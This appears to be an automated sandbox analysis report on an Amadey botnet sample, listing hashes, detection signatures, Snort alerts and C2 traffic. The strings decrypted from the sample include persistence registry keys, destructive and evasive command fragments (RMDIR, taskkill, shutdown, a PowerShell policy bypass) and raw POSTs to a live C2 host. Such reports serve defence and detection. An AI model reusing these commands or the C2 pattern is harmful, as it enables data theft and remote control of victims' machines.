Windows Analysis Report
oTIHRjz4dn.exe

Overview

General Information

Sample name: oTIHRjz4dn.exe (renamed because the original name is a hash value)
Original sample name: CC9B99CBE81EB73C242AEE7507B24206.exe
Analysis ID: 1432635
MD5: cc9b99cbe81eb73c242aee7507b24206
SHA1: b237cbe8a53534b73f1624213fded9fd67258e37
SHA256: 8939a6a2ab0924c21b0ee812340da080dccd3396b5a698f06740aa2f49ff9bf7
Tags: Amadeyexe

Detection

Amadey
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Amadey
Yara detected Amadeys stealer DLL
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files

Classification

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Blogpost URLs: (empty)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

AV Detection

Source: oTIHRjz4dn.exe Avira: detected
Source: oTIHRjz4dn.exe Malware Configuration Extractor: Amadey {"C2 url": "greatnessappreviews.com/8BvxwQdec3/index.php", "Version": "4.19"}
Source: rtattack.xycydau0.fun Virustotal: Detection: 5%
Source: oTIHRjz4dn.exe Virustotal: Detection: 57%
Source: oTIHRjz4dn.exe ReversingLabs: Detection: 71%
Source: oTIHRjz4dn.exe Joe Sandbox ML: detected
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: greatnessappreviews.com
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: /8BvxwQdec3/index.php
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: S-%lu-
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: 3d37ae315d
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: Dctooux.exe
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: Startup
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: cmd /C RMDIR /s/q
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: rundll32
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: Programs
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: %USERPROFILE%
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: cred.dll|clip.dll|
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: http://
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: https://
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: /Plugins/
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: &unit=
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: shell32.dll
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: kernel32.dll
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: GetNativeSystemInfo
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: ProgramData\
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: AVAST Software
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: Kaspersky Lab
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: Panda Security
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: Doctor Web
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: 360TotalSecurity
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: Bitdefender
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: Norton
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: Sophos
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: Comodo
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: WinDefender
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: 0123456789
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: ------
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: ?scr=1
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: ComputerName
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: -unicode-
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: VideoID
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: DefaultSettings.XResolution
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: DefaultSettings.YResolution
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: ProductName
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: CurrentBuild
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: rundll32.exe
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: "taskkill /f /im "
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: " && timeout 1 && del
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: && Exit"
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: " && ren
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: Powershell.exe
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: -executionpolicy remotesigned -File "
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: shutdown -s -t 0
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: random
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: >0b*j'
Source: oTIHRjz4dn.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: oTIHRjz4dn.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Networking

Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49735 -> 45.156.23.149:80
Source: Traffic Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.4:49738 -> 45.156.23.149:80
Source: Traffic Snort IDS: 2856122 ETPRO TROJAN Amadey CnC Response M1 45.156.23.149:80 -> 192.168.2.4:49738
Source: Traffic Snort IDS: 2044623 ET TROJAN Amadey Bot Activity (POST) 192.168.2.4:49752 -> 45.156.23.149:80
Source: Traffic Snort IDS: 2044623 ET TROJAN Amadey Bot Activity (POST) 192.168.2.4:49757 -> 45.156.23.149:80
Source: Traffic Snort IDS: 2044623 ET TROJAN Amadey Bot Activity (POST) 192.168.2.4:49763 -> 45.156.23.149:80
Source: Malware configuration extractor URLs: greatnessappreviews.com/8BvxwQdec3/index.php
Source: global traffic HTTP traffic detected: POST /8BvxwQdec3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODQ4OTU=Host: greatnessappreviews.comContent-Length: 85047Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8BvxwQdec3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: greatnessappreviews.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8BvxwQdec3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: greatnessappreviews.comContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 35 30 38 39 32 32 43 37 30 41 37 36 36 35 39 43 42 34 36 41 36 34 33 43 35 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 34 44 34 43 32 31 31 35 30 37 30 46 45 41 37 35 39 36 46 36 34 35 37 39 45 43 38 42 32 34 38 32 41 42 41 45 36 43 38 31 31 38 35 36 46 30 30 35 41 45 30 37 38 45 35 35 31 37 39 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34508922C70A76659CB46A643C5D58C48CF8B295278F7EBCB075A9634F4D4C2115070FEA7596F64579EC8B2482ABAE6C811856F005AE078E55179
Source: global traffic HTTP traffic detected: POST /8BvxwQdec3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUyMDU=Host: greatnessappreviews.comContent-Length: 85357Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8BvxwQdec3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: greatnessappreviews.comContent-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 31 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000154001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /8BvxwQdec3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODQ4NzY=Host: greatnessappreviews.comContent-Length: 85028Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8BvxwQdec3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: greatnessappreviews.comContent-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 34 32 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000427001&unit=246122658369
Source: Joe Sandbox View ASN Name: CLOUDBACKBONERU CLOUDBACKBONERU
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.199.237
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: greatnessappreviews.com
Source: global traffic DNS traffic detected: DNS query: rtattack.xycydau0.fun
Source: unknown HTTP traffic detected: POST /8BvxwQdec3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODQ4OTU=Host: greatnessappreviews.comContent-Length: 85047Cache-Control: no-cache
Source: oTIHRjz4dn.exe, 00000000.00000003.1746459480.00000000012D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://greatnessappreviews.com/
Source: oTIHRjz4dn.exe, 00000000.00000003.1707871130.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, oTIHRjz4dn.exe, 00000000.00000003.1746459480.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, oTIHRjz4dn.exe, 00000000.00000003.1746459480.00000000012DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://greatnessappreviews.com/8BvxwQdec3/index.php
Source: oTIHRjz4dn.exe, 00000000.00000003.1746459480.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, oTIHRjz4dn.exe, 00000000.00000003.1707871130.00000000012FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://greatnessappreviews.com/8BvxwQdec3/index.php5
Source: oTIHRjz4dn.exe, 00000000.00000003.1707871130.0000000001310000.00000004.00000020.00020000.00000000.sdmp, oTIHRjz4dn.exe, 00000000.00000003.1746459480.0000000001310000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://greatnessappreviews.com/8BvxwQdec3/index.php?scr=1
Source: oTIHRjz4dn.exe, 00000000.00000003.1746459480.0000000001310000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://greatnessappreviews.com/8BvxwQdec3/index.php?scr=1N8
Source: oTIHRjz4dn.exe, 00000000.00000003.1707871130.0000000001310000.00000004.00000020.00020000.00000000.sdmp, oTIHRjz4dn.exe, 00000000.00000003.1746459480.0000000001310000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://greatnessappreviews.com/8BvxwQdec3/index.php?scr=1n8
Source: oTIHRjz4dn.exe, 00000000.00000003.1746459480.00000000012FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://greatnessappreviews.com/8BvxwQdec3/index.phpO
Source: oTIHRjz4dn.exe, 00000000.00000003.1746459480.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, oTIHRjz4dn.exe, 00000000.00000003.1746459480.00000000012DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://greatnessappreviews.com/8BvxwQdec3/index.phpQ
Source: oTIHRjz4dn.exe, 00000000.00000003.1746459480.00000000012DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://greatnessappreviews.com/8BvxwQdec3/index.phpny
Source: classification engine Classification label: mal100.troj.spyw.winEXE@1/1@4/2
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Mutant created: \Sessions\1\BaseNamedObjects\f5a43204a66445ad0e09c0db80eb910b
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe File created: C:\Users\user\AppData\Local\Temp\246122658369
Source: oTIHRjz4dn.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: oTIHRjz4dn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: oTIHRjz4dn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: oTIHRjz4dn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: oTIHRjz4dn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: oTIHRjz4dn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: oTIHRjz4dn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: oTIHRjz4dn.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: oTIHRjz4dn.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: oTIHRjz4dn.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: oTIHRjz4dn.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: oTIHRjz4dn.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: oTIHRjz4dn.exe Static PE information: section name: gin
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Thread delayed: delay time: 180000
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Window / User API: threadDelayed 3552
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Window / User API: threadDelayed 6202
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe TID: 6956 Thread sleep time: -106560000s >= -30000s
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe TID: 7032 Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe TID: 6956 Thread sleep time: -186060000s >= -30000s
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Thread delayed: delay time: 30000
Source: oTIHRjz4dn.exe, 00000000.00000003.1707871130.00000000012E4000.00000004.00000020.00020000.00000000.sdmp, oTIHRjz4dn.exe, 00000000.00000003.1746459480.00000000012E4000.00000004.00000020.00020000.00000000.sdmp, oTIHRjz4dn.exe, 00000000.00000003.1707871130.0000000001310000.00000004.00000020.00020000.00000000.sdmp, oTIHRjz4dn.exe, 00000000.00000003.1746459480.0000000001310000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\Desktop\oTIHRjz4dn.exe VolumeInformation
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000154001\clip.exe VolumeInformation
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000427001\ma.exe VolumeInformation
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation

Stealing of Sensitive Information

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: oTIHRjz4dn.exe, type: SAMPLE
Source: Yara match File source: 0.0.oTIHRjz4dn.exe.800000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1651432093.0000000000801000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY